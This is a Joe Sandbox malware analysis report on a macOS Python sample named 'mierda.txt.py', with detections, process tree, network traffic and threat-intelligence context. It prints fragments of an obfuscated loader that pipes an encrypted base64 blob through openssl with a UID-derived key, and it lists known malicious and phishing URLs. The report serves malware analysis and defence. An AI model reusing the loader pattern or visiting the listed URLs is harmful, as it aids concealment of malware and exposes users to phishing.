Edit tour

macOS Analysis Report
mierda.txt.py

Overview

General Information

Sample name:	mierda.txt.py
Analysis ID:	1583537
MD5:	0ca648abfff1b48d2ebebf365475df31
SHA1:	b715e20fe4b89bd14a185c701d0bd6adad8b0dc6
SHA256:	f355dfc3431924487c14cee5a1cd7c856028557ae8c8d4acadab7b36257a05e3
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Process executable has a file extension which is uncommon (probably to disguise the executable)

Executes commands using a shell command-line interpreter

Executes the "ifconfig" command used to gather network information

Executes the "openssl" command used for cryptographic operations

Executes the "python" command used to interpret Python scripts

Reads the systems OS release and/or type

Reads the systems hostname

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583537
Start date and time:	2025-01-03 00:50:32 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Virtual Machine, Mojave (Office 16 16.27, Java 11.0.2+9, Adobe Reader 2019.010.20099)
macOS major version:	10.14
CPU architecture:	x86_64
Analysis Mode:	default
Sample name:	mierda.txt.py
Detection:	MAL
Classification:	mal60.evad.macPY@0/0@1/0

Warnings

Excluded IPs from analysis (whitelisted): 17.253.13.143, 17.253.13.133, 17.36.200.79, 17.253.13.144, 23.197.212.34
Excluded domains from analysis (whitelisted): lcdn-locator-usuqo.apple.com.akadns.net, updates.cdn-apple.com.akadns.net, e673.dsce9.akamaiedge.net, crl.apple.com, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, lcdn-locator.apple.com.akadns.net, lcdn-locator.apple.com, mesu.g.aaplimg.com, updates.g.aaplimg.com, itunes.apple.com.edgekey.net, init.itunes.apple.com, mesu.apple.com, updates.cdn-apple.com, init-cdn.itunes-apple.com.akadns.net
VT rate limit hit for: mierda.txt.py

Runtime Messages

Command:	/Users/bernard/Desktop/mierda.txt.py
PID:	624
Exit Code:	1
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	bad decrypt 4589979244:error:06FFF064:digital envelope routines:CRYPTO_internal:bad decrypt:/BuildRoot/Library/Caches/com.apple.xbs/Sources/libressl/libressl-22.230.1/libressl-2.6/crypto/evp/evp_enc.c:533: Traceback (most recent call last): File "/Users/bernard/Desktop/mierda.txt.py", line 10, in <module> Nxr9uMBIl9+CaQkWLpF65JmsIrTbZV000dzzi5xKpfcux82nWWMySMFOsfVUlpOhXyo1U89SPVpL9Mgl/DylC41I9dMCHnrFIuucMaftsP3c51MZFUzanDfiiezYv2J8jrto6JDQGwuqPgIBNhZCLC8lwtVx8UELNril6RU6O65OSRUnRu/BbWn8hM7AbxiUgBq/SBuT1jY7u7qWxajUX1GldPxx+8vKqtOh9E4pvQDc/rGmFAwChq9wt06u3TC7Ada0JQYj4UdSRDG7X2FLYWipcwYzY2kLnSYTw89Hy8KYjHImq8tyt3FgLWVykEEk76vc+2EdjkNSy2bqz35adiMpHmlbipO5GQVTArN/1IwFpSW9X8zv9mqgvwS+Nv746uqNUMoHIf6aozZ4H69sw3WpSUB6Xo4GlzxpSJSRkaSR/7D+7y1iWcwrzxwTMNjtk2YdqYJRwFsFuwEH5q9ejeTcOvCdbBTk+Hdz/XgTG0yflLjXOnasShumYz8EDAOesvz8Fj1KnSdgVymBVVPmTJGAnpq/sfZFtUW2A3PXnWi+BtoNhHh+DrIl71KuYmNoZsAsr5SBRfuvw5SjySaelsZWrRNl6GVdz8DTREw5EMEEjzkBq5ego1z/nvNlU9ZldupWPbOX9B/243dCc6ikArqU6fAIGNqTJGkRIwXlK8wcF77ILO6KCPV3oX4PIflnEqUJl/WEN9tqyeGwXe3mhcEY+d55Vy/GxIRjrW3e3aofGQvuYCzsISaG4qixuz+4DQP2vGkcYc0kSCfUTM4zNGI5O78nA6gfL/tk3dCUsvoTtgqnHgKeKhm9jhfEQVIBoXsDFOSNB1GDEr9NiJ+gnSV0+JGVFTwhuMYQINXh21ah/yEWwW60nlfHhnqN8BCPnYdE4nP6H3hlMU2a9sdHRUWjATAz+IN+kikJaZJzsepxSIhBb8hv5WZYjAV21syIf5VJL56RZzaa/mIJ+mD8Qc181xcWiLNbW40kyrFT86el250vCUa9cb2VlZB999DTSgmlrScuOMessIv4I4Eoe9GZkpK9nGgR7Jm3v51V7s3Y+4PAzaNhu7lcpFmdjORPk2BczhB82JZ6MZN39IvcE/J14/tMvD9qDDUU/Msy9yy2bFmqEta59tWMmpB4xVi0dLdk1xdGuyP9VocdIO6XocTDg8TCA8iJYGv2hmutgPciPoBcs+YS42AMDCd6W9DNICeyJIc4+weNQ0Tcb00R/N1QfQ0NEvaUQnfszmByTRoL2uEiQwI2jZl8lWZItyRak+qjgPu0fKnNbgVyPtd2A16G6Xqc5MruMwl0qUO84Y7LiGvo7lDyapCSTVvW+7nO1yp3AXvr6eOHLwwtWfDMFoQSR/PvuR+kbYDW8vP9HNUCGC9oK4CgTV8oOArG3hXvaT7PA0t4Yuf3fswgXfhSayIpmDOGEc7pM0OqOfshUt0uG1Q0xNr60qMYuxc+9jJ22gV2TzX0GR1Hz1OHgi3ZbyCTlpkZubDU+4uYZBsoRMwSk51dqAe3EITNlM+f+kNfL3BJmkSypbMN0ggklstx5+7VIDVd8gPeGs+5K4rqNnHjDSrYBPMKcGn/MUPKDQsgcV5WzBbjRl8koXazLTZ9ROSHEHhak5tqCY8pQza116nCbQ=' \| openssl aes-256-cbc -A -d -a -k %s -md md5" % get_uid()).readlines())) TypeError: expected string without null bytes

Process Tree

System is macvm-mojave

mono-sgen32 New Fork (PID: 624, Parent: 537)

mierda.txt.py (MD5: 0ca648abfff1b48d2ebebf365475df31) Arguments: /Users/bernard/Desktop/mierda.txt.py

python (MD5: e8975ecc31cf18878c0e0bb943a33379) Arguments: python /Users/bernard/Desktop/mierda.txt.py

Python (MD5: 710c6cc30780eea712240851b44d9eab) Arguments: python /Users/bernard/Desktop/mierda.txt.py

sh New Fork (PID: 625, Parent: 624)

sh New Fork (PID: 626, Parent: 625)

ifconfig (MD5: 0c60b4d4632aa1db59b69584e2a3b09b) Arguments: /sbin/ifconfig

sh New Fork (PID: 627, Parent: 624)

sh New Fork (PID: 628, Parent: 627)

sh New Fork (PID: 629, Parent: 627)

openssl (MD5: 99bad7d4348295bf9a3e457c7c4942b6) Arguments: openssl aes-256-cbc -A -d -a -k 726f6f742d38373936373630303930303537 -md md5

xpcproxy New Fork (PID: 647, Parent: 1)

eficheck (MD5: 328beb81a2263449258057506bb4987f) Arguments: /usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: mierda.txt.py

Avira: detected

Multi AV Scanner detection for submitted file

Source: mierda.txt.py

ReversingLabs: Detection: 47%

Source: /bin/sh (PID: 629)

Openssl executable: /usr/bin/openssl -> openssl aes-256-cbc -A -d -a -k 726f6f742d38373936373630303930303537 -md md5

Jump to behavior

Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49378 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49379 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49380 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49381 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49395 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49397 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49398 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 23.197.213.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.197.213.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.125.165
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.125.165
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.125.165
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.125.165
Source: unknown	TCP traffic detected without corresponding DNS query: 23.193.125.165
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: h3.apis.apple.map.fastly.net

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49389
Source: unknown	Network traffic detected: HTTP traffic on port 49397 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49383
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49382
Source: unknown	Network traffic detected: HTTP traffic on port 49395 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49381
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49380
Source: unknown	Network traffic detected: HTTP traffic on port 49378 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49379
Source: unknown	Network traffic detected: HTTP traffic on port 49398 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49378
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49398
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49397
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49395
Source: unknown	Network traffic detected: HTTP traffic on port 49379 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49354 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49389 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49383 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49381 -> 443

Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49378 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49379 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49380 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49381 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49395 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49397 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49398 version: TLS 1.2

Source: classification engine

Classification label: mal60.evad.macPY@0/0@1/0

Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 624)	Shell command executed: sh -c LC_ALL=C /sbin/ifconfig 2>/dev/null			Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 624)	Shell command executed: sh -c echo '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			Jump to behavior

Source: /Users/bernard/Desktop/mierda.txt.py (PID: 624)

Python executable: /usr/bin/python -> python /Users/bernard/Desktop/mierda.txt.py

Jump to behavior

Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 647)

Random device file read: /dev/random

Jump to behavior

Source: /usr/bin/python (PID: 624)

Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Process executable has a file extension which is uncommon (probably to disguise the executable)

Source: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 (PID: 624)

Process executable with extension: /Users/bernard/Desktop/mierda.txt.py

Jump to behavior

Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 624)	Sysctl requested: kern.ostype (1.1)			Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 624)	Sysctl requested: kern.osrelease (1.2)			Jump to behavior

Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 624)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 625)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 627)	Sysctl requested: kern.hostname (1.10)	Jump to behavior

Source: /bin/sh (PID: 626)

Ifconfig executable: /sbin/ifconfig -> /sbin/ifconfig

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	2 Scripting	Path Interception	1 Masquerading	OS Credential Dumping	2 System Information Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Configuration Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Asymmetric Cryptography	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mierda.txt.py	47%	ReversingLabs	MacOS.Trojan.SpyEvil
mierda.txt.py	100%	Avira	ADWARE/OSX.Script.Gen2

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
h3.apis.apple.map.fastly.net	151.101.3.6	true	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.193.125.165	unknown	United States	16625	AKAMAI-ASUS	false
151.101.3.6	h3.apis.apple.map.fastly.net	United States	54113	FASTLYUS	false
151.101.195.6	unknown	United States	54113	FASTLYUS	false
151.101.67.6	unknown	United States	54113	FASTLYUS	false
23.197.213.54	unknown	United States	16625	AKAMAI-ASUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
151.101.3.6	18037.doc	Get hash	malicious	Unknown	Browse
	https://docs.google.com/presentation/d/e/2PACX-1vTBMx4bSFDj_B_GCJTdTqUpVgpLXyQPR3uFGYP9j81KKHswOSbzMWDM5ZByYtVAwpACe-iOzHmzehje/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse
	Telegram	Get hash	malicious	Unknown	Browse
	http://eocf.jyjwohl.ru/KIOJOJMAIEJFLVSF280212193270471103367JIGUHOIIAX4RQ0SVD?beunjabnkfaakr796013636449016227029WA5LIQI5PMNQO0EETOR	Get hash	malicious	Unknown	Browse
	https://commandes.maisonetstyles.com/Short/?Verification=aalborz_02@yahoo.com	Get hash	malicious	Unknown	Browse
	https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918	Get hash	malicious	Unknown	Browse
	CalendlyApp	Get hash	malicious	Unknown	Browse
	Constate	Get hash	malicious	Unknown	Browse
	sakura	Get hash	malicious	Unknown	Browse
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl1bBkz1ufgENuAZF1ODXRkOEXcot-2BlieaBFtd0IhXM08Jp__OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOxzyaiykDuoFljiX91jkOGF7TGq8s59HY1LfNpqOHr1hEZu4XswpdGfGTbIsw4Mg7Ewx-2FAzTwbYOEI5c5W9xQE63UMPeYSBL2GJwQizVTVETCyjhoaIq4ot5vl7L-2BMO3KbJCX7vVUyT6NGOFhbY99Ap0lxFmjxSsCRRr7CrNGrevXE9jp8IJyovKPHHX6-2FxnVR-2BVdKd5S1Zkq94QkyDWCs9lCPSQ3LNxOSscF1edS7fTz6-2Bswo-2FZW2dAOCyCTKBxs-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse
151.101.195.6	rrr	Get hash	malicious	Unknown	Browse
	ab_j	Get hash	malicious	Rust Stealer	Browse
	http://eocf.jyjwohl.ru/KIOJOJMAIEJFLVSF280212193270471103367JIGUHOIIAX4RQ0SVD?beunjabnkfaakr796013636449016227029WA5LIQI5PMNQO0EETOR	Get hash	malicious	Unknown	Browse
	https://commandes.maisonetstyles.com/Short/?Verification=aalborz_02@yahoo.com	Get hash	malicious	Unknown	Browse
	https://henrybodmerabeggco.wordpress.com/abegg-co-ag-proposal/	Get hash	malicious	Unknown	Browse
	CalendlyApp	Get hash	malicious	Unknown	Browse
	CalendlyApp	Get hash	malicious	Unknown	Browse
	https://burlingtonenqlish.com/vm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/	Get hash	malicious	Unknown	Browse
	Constate	Get hash	malicious	Unknown	Browse
	iB8UZgdjgk	Get hash	malicious	CTHULHU STEALER	Browse
151.101.67.6	ab_j	Get hash	malicious	Rust Stealer	Browse
	CGESrv	Get hash	malicious	CobaltStrike	Browse
	18037.doc	Get hash	malicious	Unknown	Browse
	https://docs.google.com/presentation/d/e/2PACX-1vTBMx4bSFDj_B_GCJTdTqUpVgpLXyQPR3uFGYP9j81KKHswOSbzMWDM5ZByYtVAwpACe-iOzHmzehje/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse
	Telegram	Get hash	malicious	Unknown	Browse
	http://eocf.jyjwohl.ru/KIOJOJMAIEJFLVSF280212193270471103367JIGUHOIIAX4RQ0SVD?beunjabnkfaakr796013636449016227029WA5LIQI5PMNQO0EETOR	Get hash	malicious	Unknown	Browse
	https://commandes.maisonetstyles.com/Short/?Verification=aalborz_02@yahoo.com	Get hash	malicious	Unknown	Browse
	V6QED2Q1WBYVOPE	Get hash	malicious	Unknown	Browse
	V6QED2Q1WBYVOPE	Get hash	malicious	Unknown	Browse
	CalendlyApp	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
h3.apis.apple.map.fastly.net	rrr	Get hash	malicious	Unknown	Browse	151.101.195.6
	ab_j	Get hash	malicious	Rust Stealer	Browse	151.101.3.6
	CGESrv	Get hash	malicious	CobaltStrike	Browse	151.101.3.6
	18037.doc	Get hash	malicious	Unknown	Browse	151.101.3.6
	Telegram	Get hash	malicious	Unknown	Browse	151.101.3.6
	http://eocf.jyjwohl.ru/KIOJOJMAIEJFLVSF280212193270471103367JIGUHOIIAX4RQ0SVD?beunjabnkfaakr796013636449016227029WA5LIQI5PMNQO0EETOR	Get hash	malicious	Unknown	Browse	151.101.131.6
	https://commandes.maisonetstyles.com/Short/?Verification=aalborz_02@yahoo.com	Get hash	malicious	Unknown	Browse	151.101.3.6
	V6QED2Q1WBYVOPE	Get hash	malicious	Unknown	Browse	151.101.131.6
	https://henrybodmerabeggco.wordpress.com/abegg-co-ag-proposal/	Get hash	malicious	Unknown	Browse	151.101.195.6
	https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918	Get hash	malicious	Unknown	Browse	151.101.3.6

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	http://hotelyetipokhara.com	Get hash	malicious	Unknown	Browse	151.101.67.1
	https://realpaperworks.com/wp-content/red/UhPIYa	Get hash	malicious	Unknown	Browse	151.101.194.137
	http://boir.org	Get hash	malicious	Unknown	Browse	151.101.2.133
	https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08ok	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	151.101.66.49
	https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63	Get hash	malicious	HTMLPhisher	Browse	151.101.1.229
	https://www.gazeta.ru/politics/news/2024/12/22/24684722.shtml	Get hash	malicious	HTMLPhisher	Browse	151.101.129.229
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	151.101.1.229
	rrr	Get hash	malicious	Unknown	Browse	151.101.195.6
	https://www.ecorfan.org/	Get hash	malicious	Unknown	Browse	151.101.194.137
AKAMAI-ASUS	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	23.32.185.35
	DEMONS.x86.elf	Get hash	malicious	Unknown	Browse	96.25.164.130
	DEMONS.spc.elf	Get hash	malicious	Unknown	Browse	104.115.175.219
	ab_j	Get hash	malicious	Rust Stealer	Browse	23.67.65.229
	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	armv6l.elf	Get hash	malicious	Unknown	Browse	104.72.144.32
	https://bitl.to/3Y0B	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.102.43.106
	KRNL.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
FASTLYUS	http://hotelyetipokhara.com	Get hash	malicious	Unknown	Browse	151.101.67.1
	https://realpaperworks.com/wp-content/red/UhPIYa	Get hash	malicious	Unknown	Browse	151.101.194.137
	http://boir.org	Get hash	malicious	Unknown	Browse	151.101.2.133
	https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08ok	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
